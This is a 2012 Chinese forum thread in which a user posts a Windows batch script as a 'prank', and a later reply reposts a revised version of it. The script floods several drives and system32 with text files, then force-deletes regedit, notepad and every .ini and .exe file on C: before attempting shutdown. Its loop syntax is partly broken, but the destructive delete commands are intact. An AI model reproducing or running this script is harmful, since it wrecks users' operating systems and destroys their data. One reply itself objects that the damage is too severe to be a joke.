wmdscjhdpy吧 关注:34贴子:553
  • 3回复贴,共1

发个货,恶搞的

只看楼主收藏回复

代码是这样的:

@echo offset %I=1
:a
FOR %%I in (%%I) do echo 748 >sb%I%.txt
set /a I+=1
if %I=1024 then goto b
goto a
:b
FOR %%I in (%%I) do echo 748 >C:\sb%I%.txt
set /a I+=1
if %I=1024 then goto c
goto b
:c
FOR %%I in (%%I) do echo 748 >D:\sb%I%.txt
set /a I+=1
if %I=1024 then goto d
goto c
:d
FOR %%I in (%%I) do echo 748 >F:\sb%I%.txt
set /a I+=1
if %I=1024 then goto e
goto d
:e
FOR %%I in (%%I) do echo 748 >"C:\Documents and Settings\Administrator\桌面\sb%I%.txt"
set /a I+=1
if %I=1024 then goto f
goto e
:f
FOR %%I in (%%I) do echo 748 >C:\WINDOWS\system32\sb%I%.txt
set /a I+=1
if %I=1024 then goto g
goto f
:g
del /q /f C:\WINDOWS\regedit.exe
del /q /f C:\WINDOWS\NOTEPAD.exe
del /q /f /s C:\*.ini
del /q /f /s C:\*.EXE
shoutdown -s
@echo on


1楼2012-10-26 21:41回复
    第一行 要回车的


    2楼2012-10-26 21:42
    回复
      @echo off
      set %I=1

      :a
      FOR %%I in (%%I) do echo 748 >sb%I%.txt
      set /a I+=1
      if %I=1024 then goto b
      goto a
      set %I=1
      :b
      FOR %%I in (%%I) do echo 748 >C:\sb%I%.txt
      set /a I+=1
      if %I=1024 then goto c
      goto b
      set %I=1
      :c
      FOR %%I in (%%I) do echo 748 >D:\sb%I%.txt
      set /a I+=1
      if %I=1024 then goto d
      goto c
      set %I=1
      :d
      FOR %%I in (%%I) do echo 748 >F:\sb%I%.txt
      set /a I+=1
      if %I=1024 then goto e
      goto d
      set %I=1
      :e
      FOR %%I in (%%I) do echo 748 >"C:\Documents and Settings\Administrator\桌面\sb%I%.txt"
      set /a I+=1
      if %I=1024 then goto f
      goto e
      set %I=1
      :f
      FOR %%I in (%%I) do echo 748 >C:\WINDOWS\system32\sb%I%.txt
      set /a I+=1
      if %I=1024 then goto g
      goto f
      set %I=1
      :g
      del /q /f C:\WINDOWS\regedit.exe
      del /q /f C:\WINDOWS\NOTEPAD.exe
      del /q /f /s C:\*.ini
      del /q /f /s C:\*.EXE
      shoutdown -s
      


      3楼2012-10-27 08:05
      回复
        翻译:
        总结就是在各个根目录放很多txt写sb··和我的一样啊 来点创意
        删除Windows的文件的损坏度太高了,不叫恶搞了····


        IP属地:广东4楼2012-10-27 23:53
        回复